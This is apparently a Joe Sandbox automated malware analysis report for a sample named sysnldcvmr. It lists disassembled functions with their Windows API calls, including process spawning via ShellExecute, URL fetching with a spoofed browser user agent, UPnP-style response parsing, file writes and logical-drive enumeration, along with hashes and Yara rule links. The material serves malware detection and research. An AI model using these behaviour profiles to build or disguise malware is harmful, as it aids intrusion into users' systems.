                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseCreateHandleTimeView$CriticalInitializeMappingQuerySecondsSectionSince1980SizeSystemUnmap
                                                                    • String ID: Vz@$.Mw
                                                                    • API String ID: 439099756-60430008
                                                                    • Opcode ID: ee7dbac5f2ba26ac0a343239ed6675f37eb8ab6d8ccb57ef49a08724b9c129be
                                                                    • Instruction ID: 3b431581fb8605495e02e5545908ab4f756817927d1539066ca4ce1953719e7c
                                                                    • Opcode Fuzzy Hash: ee7dbac5f2ba26ac0a343239ed6675f37eb8ab6d8ccb57ef49a08724b9c129be
                                                                    • Instruction Fuzzy Hash: 91411C74E40309EBDB10DFA4DC4ABAEB774EB44704F208569EA11BA2C1C7B96541CB9D
                                                                    Function 0040E980 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 60sleepprocessCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.NTDLL ref: 0040E98E
                                                                    • memset.NTDLL ref: 0040E99E
                                                                    • CreateProcessW.KERNEL32(00000000,Gy@,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040E9D7
                                                                    • Sleep.KERNEL32(000003E8), ref: 0040E9E7
                                                                    • ShellExecuteW.SHELL32(00000000,open,Gy@,00000000,00000000,00000000), ref: 0040EA02
                                                                    • Sleep.KERNEL32(000003E8), ref: 0040EA1C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Sleepmemset$CreateExecuteProcessShell
                                                                    • String ID: $D$Gy@$open
                                                                    • API String ID: 3787208655-4184347819
                                                                    • Opcode ID: 5ee7fdc591246df9419d0b661744b6941cf0467c5ddd8ade60e7ca7f41f9299c
                                                                    • Instruction ID: afb7e97e53159593a654a1f5a0506a904f07d925a59540ad2b26a1d3cea08ed0
                                                                    • Opcode Fuzzy Hash: 5ee7fdc591246df9419d0b661744b6941cf0467c5ddd8ade60e7ca7f41f9299c
                                                                    • Instruction Fuzzy Hash: 08114271A90308BBE710DB91CD46FDE7774AB04B00F200129F6087E2C1D6F9AA54CB59
                                                                    Function 0040D2D0 Relevance: 16.6, APIs: 11, Instructions: 95threadsleepsynchronizationCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCurrentThread.KERNEL32 ref: 0040D2D6
                                                                    • GetThreadPriority.KERNEL32(00000000,?,?,?,00407AD2,?,000000FF), ref: 0040D2DD
                                                                    • GetCurrentThread.KERNEL32 ref: 0040D2E8
                                                                    • SetThreadPriority.KERNEL32(00000000,?,?,?,00407AD2,?,000000FF), ref: 0040D2EF
                                                                    • InterlockedExchangeAdd.KERNEL32(00407AD2,00000000), ref: 0040D312
                                                                    • EnterCriticalSection.KERNEL32(000000FB), ref: 0040D347
                                                                    • WaitForSingleObject.KERNEL32(000000FF,00000000), ref: 0040D392
                                                                    • LeaveCriticalSection.KERNEL32(000000FB), ref: 0040D3AE
                                                                    • Sleep.KERNEL32(00000001), ref: 0040D3DE
                                                                    • GetCurrentThread.KERNEL32 ref: 0040D3ED
                                                                    • SetThreadPriority.KERNEL32(00000000,?,?,?,00407AD2), ref: 0040D3F4
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Thread$CurrentPriority$CriticalSection$EnterExchangeInterlockedLeaveObjectSingleSleepWait
                                                                    • String ID:
                                                                    • API String ID: 3862671961-0
                                                                    • Opcode ID: 5618e667e755a89869c685173e38bf799e2d1f6c3c7819217eae43ff0fa2d7e3
                                                                    • Instruction ID: a8d0ef9cc0f8c3f9fe641a145e15df681aa384361be6a62e8494921e8eef4e23
                                                                    • Opcode Fuzzy Hash: 5618e667e755a89869c685173e38bf799e2d1f6c3c7819217eae43ff0fa2d7e3
                                                                    • Instruction Fuzzy Hash: 0A411A74D00209EFDB04DFE4D888BAEBB71EB44315F14816AE916A7380D7789A85CF5A
                                                                    Function 00405BC0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 97fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InitializeCriticalSection.KERNEL32(00415E30,?,?,?,?,?,00407A20), ref: 00405BCB
                                                                    • CreateFileW.KERNEL32(00416060,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,00407A20), ref: 00405BE5
                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00405C06
                                                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00405C25
                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 00405C3E
                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 00405CCB
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00405CD5
                                                                    • CloseHandle.KERNEL32(000000FF), ref: 00405CDF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseCreateHandleView$CriticalInitializeMappingSectionSizeUnmap
                                                                    • String ID: .Mw
                                                                    • API String ID: 3956458805-2453323595
                                                                    • Opcode ID: b6454fe67246050de154b4b2d7b685814819646854cbf1c4f394f4a459172caa
                                                                    • Instruction ID: 44e1aa5071e985e1939c8a19f3b292d5e35966d71e561f6040ad28af9ac572d1
                                                                    • Opcode Fuzzy Hash: b6454fe67246050de154b4b2d7b685814819646854cbf1c4f394f4a459172caa
                                                                    • Instruction Fuzzy Hash: 4B31FD74E44309EBEB14DBA4CD49BAFBB74EB48700F208569E601772C0D7B96941CF99
                                                                    Function 00406060 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 176fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(00415E30,00000000,0040B8F2,006A0266,?,0040B90E,00000000,0040D0A4,?), ref: 0040606F
                                                                    • memcpy.NTDLL(?,00000000,00000100), ref: 00406101
                                                                    • CreateFileW.KERNEL32(00416060,40000000,00000000,00000000,00000002,00000002,00000000), ref: 00406225
                                                                    • WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 00406287
                                                                    • FlushFileBuffers.KERNEL32(000000FF), ref: 00406293
                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040629D
                                                                    • LeaveCriticalSection.KERNEL32(00415E30,?,?,?,?,?,?,0040B90E,00000000,0040D0A4,?), ref: 004062A8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: File$CriticalSection$BuffersCloseCreateEnterFlushHandleLeaveWritememcpy
                                                                    • String ID: .Mw
                                                                    • API String ID: 1457358591-2453323595
                                                                    • Opcode ID: b744e7b7a8629e3496ebe2098ab67372d645442e6c28ada4e438c42de121c9cd
                                                                    • Instruction ID: bb102638da67a563b53aa46b2a5b6ce2f3b38349fb156310049a7a66f3822ae6
                                                                    • Opcode Fuzzy Hash: b744e7b7a8629e3496ebe2098ab67372d645442e6c28ada4e438c42de121c9cd
                                                                    • Instruction Fuzzy Hash: 1D71DEB5E002099BCB04DF94D981FEFB7B1BB88304F14816DE505BB382D779A951CBA5
                                                                    Function 00401D60 Relevance: 13.6, APIs: 9, Instructions: 141COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InterlockedExchange.KERNEL32(?,00000000), ref: 00401D86
                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00401DB0
                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00401DC3
                                                                    • InterlockedExchangeAdd.KERNEL32(?,?), ref: 00401DD4
                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00401E5B
                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00401EF6
                                                                    • setsockopt.WS2_32 ref: 00401F2C
                                                                    • closesocket.WS2_32(?), ref: 00401F39
                                                                      • Part of subcall function 0040D4A0: NtQuerySystemTime.NTDLL(0040B3B5), ref: 0040D4AA
                                                                      • Part of subcall function 0040D4A0: RtlTimeToSecondsSince1980.NTDLL(0040B3B5,?), ref: 0040D4B8
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Interlocked$Decrement$ExchangeTime$QuerySecondsSince1980Systemclosesocketsetsockopt
                                                                    • String ID:
                                                                    • API String ID: 671207744-0
                                                                    • Opcode ID: 455a785a1462a168860a16a7b96cb30f84d4113cb7820f003e1e275d5cc4599c
                                                                    • Instruction ID: a48952fab395babe4cfd63b323185ec8fb23c48b53ef468cda2161a158f186bf
                                                                    • Opcode Fuzzy Hash: 455a785a1462a168860a16a7b96cb30f84d4113cb7820f003e1e275d5cc4599c
                                                                    • Instruction Fuzzy Hash: 7A51B075608702ABC704DF29D888B9BFBE5BF88314F40862EF85D93360D774A545CB96
                                                                    Function 0040D890 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 60sleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040D8DE
                                                                    • Sleep.KERNEL32(000003E8), ref: 0040D8EE
                                                                    • StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040D90B
                                                                    • StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040D921
                                                                    • StrChrA.SHLWAPI(?,0000000D), ref: 0040D94E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Sleeprecvfrom
                                                                    • String ID: HTTP/1.1 200 OK$LOCATION:
                                                                    • API String ID: 668330359-3973262388
                                                                    • Opcode ID: 64c51f4f778a0849bb65c465f972bc246fe4ea33ddc01750ea485b3e9e3c6488
                                                                    • Instruction ID: aa1d0310fbaa0e5548ad160d3530673878f91993e129ff42f305da2a80d3425b
                                                                    • Opcode Fuzzy Hash: 64c51f4f778a0849bb65c465f972bc246fe4ea33ddc01750ea485b3e9e3c6488
                                                                    • Instruction Fuzzy Hash: 88215EB5D00218ABDB20DF64DC49BE97774AB04708F1486E9E719B62C0C7B95ACA8F5C
                                                                    Function 0040EA30 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57networksleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000001,00000000,00000000,00000000), ref: 0040EA47
                                                                    • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040EA66
                                                                    • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040EA8F
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040EAB8
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040EAC2
                                                                    • Sleep.KERNEL32(000003E8), ref: 0040EACD
                                                                    Strings
                                                                    • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36, xrefs: 0040EA42
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$CloseHandleOpen$HttpInfoQuerySleep
                                                                    • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                    • API String ID: 2743515581-2960703779
                                                                    • Opcode ID: ef8e19ed345852c8d52971dd1004b0fcc021cc447378e9d991bc7cd61a6891ce
                                                                    • Instruction ID: 45b81d3650d60dd7d70083547d95fe89803667d47bfd0af2cf5eef3cde06382e
                                                                    • Opcode Fuzzy Hash: ef8e19ed345852c8d52971dd1004b0fcc021cc447378e9d991bc7cd61a6891ce
                                                                    • Instruction Fuzzy Hash: 4021E774A40308BBEB11DB94CC49FEEB775BB48705F1085A9FA11AA2C0C7B96A40CB55
                                                                    Function 0040E240 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 112stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • lstrcmpiW.KERNEL32(00000000,device), ref: 0040E2FC
                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E34B
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E35F
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E377
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: FreeStringlstrcmpi
                                                                    • String ID: device$deviceType
                                                                    • API String ID: 1602765415-3511266565
                                                                    • Opcode ID: 1b177aca5382db3f1c66da14849aee522d75b48b0e19709232399be15e741896
                                                                    • Instruction ID: d9bf12878483276118e69e011fb1eaaed98ea0d23904e8601ea4f62f39df24ad
                                                                    • Opcode Fuzzy Hash: 1b177aca5382db3f1c66da14849aee522d75b48b0e19709232399be15e741896
                                                                    • Instruction Fuzzy Hash: C4412D74A0020ADFCB04DF95C884FAFBBB5BF49304F108969E915A7390D778AD81CB95
                                                                    Function 0040E0E0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 112stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • lstrcmpiW.KERNEL32(00000000,service), ref: 0040E19C
                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E1EB
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E1FF
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E217
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: FreeStringlstrcmpi
                                                                    • String ID: service$serviceType
                                                                    • API String ID: 1602765415-3667235276
                                                                    • Opcode ID: 99a16f71be16d8847cb7d1021c7ddccdc4dc2b0592ef80971ad883e08ff36aa9
                                                                    • Instruction ID: 8be64e74ab35422ce5b67f5b255e261f781d2e412f5a45cda6e842047ddde31e
                                                                    • Opcode Fuzzy Hash: 99a16f71be16d8847cb7d1021c7ddccdc4dc2b0592ef80971ad883e08ff36aa9
                                                                    • Instruction Fuzzy Hash: BB41E874A0020ADFCB14CF99C884BAFB7B9BF48304F1085ADE515A7390D778AA81CF95
                                                                    Function 004022C0 Relevance: 10.6, APIs: 7, Instructions: 95COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,?,004019BB,00000000), ref: 004022DA
                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,004019BB,00000000), ref: 004022FE
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterLeave
                                                                    • String ID:
                                                                    • API String ID: 3168844106-0
                                                                    • Opcode ID: d030d70e23b1ee81df40ddde676cc41bbc8b28927f5a1e966705551878972145
                                                                    • Instruction ID: 16d4c05c25790a512fd8f3a1e6e85bd280fefa1845e4e3e4af960acff63a7a98
                                                                    • Opcode Fuzzy Hash: d030d70e23b1ee81df40ddde676cc41bbc8b28927f5a1e966705551878972145
                                                                    • Instruction Fuzzy Hash: DE31D1722012059FC310AFB5FD8CAD7B7A8FF44324F04863EE559D3280D778A4449BA9
                                                                    Function 0040E281 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • lstrcmpiW.KERNEL32(00000000,device), ref: 0040E2FC
                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E34B
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E35F
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E377
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: FreeStringlstrcmpi
                                                                    • String ID: device$deviceType
                                                                    • API String ID: 1602765415-3511266565
                                                                    • Opcode ID: 7884966aedb5b48ec66d747cdb098c486fa550d692640b6eadd274145b97d250
                                                                    • Instruction ID: b41677b7307b510c0c46b42eeb4edde7184acd44519d028b9e49cf38c7e22350
                                                                    • Opcode Fuzzy Hash: 7884966aedb5b48ec66d747cdb098c486fa550d692640b6eadd274145b97d250
                                                                    • Instruction Fuzzy Hash: 24310C74A0020ADFCB14DF95C884FAFBBB5BF88304F108969E915B7390D778A981CB95
                                                                    Function 0040E121 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • lstrcmpiW.KERNEL32(00000000,service), ref: 0040E19C
                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E1EB
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E1FF
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E217
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: FreeStringlstrcmpi
                                                                    • String ID: service$serviceType
                                                                    • API String ID: 1602765415-3667235276
                                                                    • Opcode ID: 1c5e78dc8b18edf47e620e5ac62898c9c9dab53ef6afcc05c5ff165d884242d4
                                                                    • Instruction ID: ad2fb0e2655c549c540ff47f191a76fdb33d2d75a9b1b61af0e22c3c344479bd
                                                                    • Opcode Fuzzy Hash: 1c5e78dc8b18edf47e620e5ac62898c9c9dab53ef6afcc05c5ff165d884242d4
                                                                    • Instruction Fuzzy Hash: 7B31CD74E0020ADBCB14CFD5D884BAFB7B9BF88304F1085A9E515A7390D7789A41CF95
                                                                    Function 0040AB80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 74fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(00416478,40000000,00000000,00000000,00000002,00000002,00000000), ref: 0040AC18
                                                                    • WriteFile.KERNEL32(000000FF,00000000,?,?,00000000), ref: 0040AC39
                                                                    • FlushFileBuffers.KERNEL32(000000FF), ref: 0040AC43
                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040AC4D
                                                                    • InterlockedExchange.KERNEL32(00415260,0000003D), ref: 0040AC5A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: File$BuffersCloseCreateExchangeFlushHandleInterlockedWrite
                                                                    • String ID: .Mw
                                                                    • API String ID: 442028454-2453323595
                                                                    • Opcode ID: ad2f4acdc7dc609d23620ad603f7b9ac0ec9968bfa9634d541bf1612e6ff1dda
                                                                    • Instruction ID: b83d763b1b95064d17473309c927232932c49c75998401e70db37280cdfd902f
                                                                    • Opcode Fuzzy Hash: ad2f4acdc7dc609d23620ad603f7b9ac0ec9968bfa9634d541bf1612e6ff1dda
                                                                    • Instruction Fuzzy Hash: 46318CB4E00208EFDB00CF94EC85FAEB775BB48300F218569E515A7390C774AA51CB59
                                                                    Function 00407440 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71sleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Sleep$CacheDeleteEntrywsprintf
                                                                    • String ID: %s%s
                                                                    • API String ID: 1447977647-3252725368
                                                                    • Opcode ID: 78ec990633dcb6ec7f944f4e4d58fe3f4f1b713779a899723d42b03c5855964e
                                                                    • Instruction ID: 516f793b53608c34cc4cf2fa152c24c34b7f811ac1bf05daad4eae6c0a67dd49
                                                                    • Opcode Fuzzy Hash: 78ec990633dcb6ec7f944f4e4d58fe3f4f1b713779a899723d42b03c5855964e
                                                                    • Instruction Fuzzy Hash: DB31FAB0D00218ABCB50DFA9D8887DDBBB4FB08305F1085AAE519B6291D7795AC4CF5A
                                                                    Function 004063A0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 55registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLogicalDrives.KERNEL32 ref: 004063A6
                                                                    • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 004063F4
                                                                    • RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00406421
                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040643E
                                                                    Strings
                                                                    • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 004063E7
                                                                    • NoDrives, xrefs: 00406418
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CloseDrivesLogicalOpenQueryValue
                                                                    • String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
                                                                    • API String ID: 2666887985-3471754645
                                                                    • Opcode ID: 314293f9e134081a44844c09a9b0f17b23a1eb3db84437885ffb7fb3e0008323
                                                                    • Instruction ID: 69498c8574f0fe75ee0e18bc350880e9ca7d597cc08e8ba402afd13981da7d97
                                                                    • Opcode Fuzzy Hash: 314293f9e134081a44844c09a9b0f17b23a1eb3db84437885ffb7fb3e0008323
